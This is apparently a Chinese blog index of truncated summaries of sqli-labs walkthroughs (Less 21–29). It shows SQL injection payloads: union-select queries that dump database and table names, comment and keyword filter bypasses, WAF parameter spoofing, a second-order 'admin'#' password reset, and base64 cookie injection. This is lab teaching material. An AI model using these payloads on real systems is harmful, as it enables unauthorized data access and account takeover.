摘要:
1.和Less(29)一样,参数变成 id=("1"),但是不知道为什么php5.3.29,5.4.45可以,其他两个无法显示 就会出现这个情况 2.爆破: (1)爆库:?id=-1") union select 1,database(),3 --+ (2)爆表:?id=-1") union sel 阅读全文
摘要:
1.这一关和Less(26)区别在于,在sql宇航员添加了一个括号,同时在SQL语句抛出错处后并不在前台页面输出,所以我们用排错型注入 sql语句:SELECT *FROM users WHERE id=('$id') LIMIT 0,1 2.爆破 (1)爆库:?id=0')%0bunion%0bs 阅读全文
摘要:
1.查看php文件,可以发现过滤了 or and /* -- # \s // (1)确认一下: ?id=%231 //确认过滤了# ?id=or1 //确认过滤了or ?id=/*1 //确认过滤了多行注释 ?id 1 //确认过滤了单行注释 ?id=/1 //确认过滤了斜杠 ?id=1' ' ' 阅读全文
摘要:
1.和上一题差不都,只是单引号变成双引号 id="1" 2.爆破: (1)爆库:?id=-1" union select 1,database(),3 --+ (2)爆表:?id=-1" union select 1,group_concat(table_name),3 from informati 阅读全文
摘要:
waf是只允许输入数字的,我们在输入数字的时候先给waf看然后检测正常后才转发给我们需要访问的页面,那篇文章是有写到的,这里我弄2个值,一个是用来欺骗waf的。另一个才是给我们需要访问页面的 看一下这篇博客,http://blog.csdn.net/nzjdsds/article/details/7 阅读全文
摘要:
1.那么盲注是怎么过滤or和and,直接在前面加or和and 不同于Less(25)的是,sql语句中对于id,没有"的包含,同时没有输出错误项,报错注入不能用。 2.联合注入 (1)爆库:?id=-1%20union%20select%201,2,database()--+ (2)爆表:?id=- 阅读全文
摘要:
1.OR&AND欺骗 (1)测试一下 ?id=1' # ?id=1' --+ 看到id周围是单引号,但是第二种没有报错,可以注入 看一下php,发现会把or 和and 转义成空格 2.--+绕过,双写or和and (1)爆库:?id=-1' union select 1,2,database()-- 阅读全文
摘要:
1.二次登陆步骤: (1)注册一个admin'#的账号 (2)账号设为admin'#,密码设为123456 成功的话,跳转页面会提示Password successfully updated (3)修改admin的密码 改为123456,这样我们就可以用管理员身份登陆 阅读全文
摘要:
1.这个没有登录框,我们先看一下php文件 看到替换了能用的注释符,所以我们构造闭合语句 2.爆破 (1)爆库:?id=' union select 1,2,database() ' (2)爆表:?id=' union select 1,2,group_concat(table_name) from 阅读全文
摘要:
1.base64编码,双引号,报错型,cookie型注入 (1)和Less(21)一样,只需要使用双引号再去掉括号 2.爆破 (1)爆库:-admin" union select 1,2,database() # LWFkbWluIiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXN 阅读全文